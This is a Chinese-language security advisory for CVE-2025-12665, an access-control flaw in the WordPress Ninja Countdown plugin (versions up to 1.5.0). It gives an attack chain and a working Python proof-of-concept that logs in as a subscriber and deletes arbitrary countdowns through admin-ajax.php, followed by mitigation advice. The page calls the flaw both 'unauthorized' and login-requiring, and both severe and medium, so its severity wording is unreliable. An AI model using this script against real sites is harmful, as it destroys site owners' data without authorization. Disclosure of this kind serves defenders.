WordPress Ninja Countdown插件未授权数据删除漏洞 (CVE-2025-12665)

漏洞信息

漏洞编号

CVE-2025-12665

漏洞类型

访问控制不当

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ninja Countdown | Fastest Countdown Builder

漏洞概述

Ninja Countdown | Fastest Countdown Builder是WordPress平台上广受欢迎的倒计时构建插件，该插件存在严重的未授权访问控制漏洞。漏洞根源在于插件的AJAX处理端点'ninja_countdown_admin_ajax'缺少适当的功能级别权限验证（Missing Function Level Access Control）。这意味着任何经过认证的低权限用户（如Subscriber角色），即使不具备管理员权限，也能够通过该端点执行数据删除操作。攻击者可以利用此漏洞删除网站上的任意倒计时数据，包括其他用户创建的倒计时，对网站内容完整性造成破坏。由于该漏洞利用无需复杂技术手段，且WordPress默认允许用户注册，使得攻击门槛极低。CVSS 4.3的评分反映了该漏洞的中等严重程度，主要影响在于数据完整性损失。

技术细节

漏洞存在于Ninja Countdown插件的AJAX请求处理逻辑中。插件在注册AJAX钩子'ninja_countdown_admin_ajax'时，未对请求进行足够的权限验证。具体而言，端点缺少两个关键检查：一是未验证当前用户是否具有管理倒计时的管理员权限；二是未验证被删除的倒计时ID是否属于当前用户。攻击者可以通过构造带有倒计时ID参数的POST请求到wp-admin/admin-ajax.php端点，触发删除操作。由于WordPress的AJAX处理机制默认允许所有已认证用户访问admin-ajax.php端点，且插件未实施额外的权限校验，导致低权限用户能够执行本应仅限管理员的操作。攻击成功后将返回JSON响应，包含被删除倒计时的ID和标题信息，确认操作完成。

攻击链分析

STEP 1

步骤1

攻击者在目标WordPress网站注册账户，获得Subscriber级别或更高权限

STEP 2

步骤2

攻击者收集目标网站上存在的倒计时ID（可通过网站前端遍历或猜测获取）

STEP 3

步骤3

攻击者构造恶意AJAX请求，POST到/wp-admin/admin-ajax.php端点，设置action参数为'ninja_countdown_admin_ajax'，operation参数为'delete'，countdown_id参数为目标倒计时ID

STEP 4

步骤4

服务器端插件接收到请求后，由于缺少权限验证和对象所属检查，直接执行数据库删除操作

STEP 5

步骤5

攻击者收到包含删除成功状态的JSON响应，确认目标倒计时已被删除

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-12665 PoC - Ninja Countdown Plugin Unauthorized Data Deletion
Description: Missing authorization check in ninja_countdown_admin_ajax AJAX endpoint
allows authenticated users with subscriber-level access to delete arbitrary countdowns.
"""

import requests
import sys

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "password123"
TARGET_COUNTDOWN_ID = 1  # ID of countdown to delete

def exploit():
    """Exploit the missing authorization vulnerability"""
    session = requests.Session()
    
    # Step 1: Authenticate with WordPress
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "redirect_to": "/wp-admin/",
        "testcookie": "1"
    }
    
    print(f"[*] Logging in as {USERNAME}...")
    resp = session.post(login_url, data=login_data, allow_redirects=True)
    
    if "wordpress_logged_in" not in str(session.cookies) and "wordpress_logged_in" not in str(resp.cookies):
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Step 2: Send malicious AJAX request to delete countdown
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    exploit_data = {
        "action": "ninja_countdown_admin_ajax",
        "operation": "delete",  # Delete operation
        "countdown_id": TARGET_COUNTDOWN_ID  # Arbitrary countdown ID
    }
    
    print(f"[*] Sending exploit request to delete countdown ID {TARGET_COUNTDOWN_ID}...")
    resp = session.post(ajax_url, data=exploit_data)
    
    # Step 3: Verify deletion
    if resp.status_code == 200:
        try:
            result = resp.json()
            if result.get("success"):
                print(f"[+] Countdown deleted successfully!")
                print(f"[+] Response: {result}")
                return True
        except:
            pass
    
    print("[-] Exploitation may have failed or target is not vulnerable")
    return False

if __name__ == "__main__":
    exploit()

影响范围

Ninja Countdown | Fastest Countdown Builder <= 1.5.0

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时措施：(1)临时禁用用户注册功能，防止新账户创建；(2)审查并移除所有非管理员用户的' Subscriber '角色；(3)使用安全插件限制AJAX端点访问；(4)对wp-content目录实施严格的文件权限控制；(5)考虑暂时停用该插件直到官方补丁发布。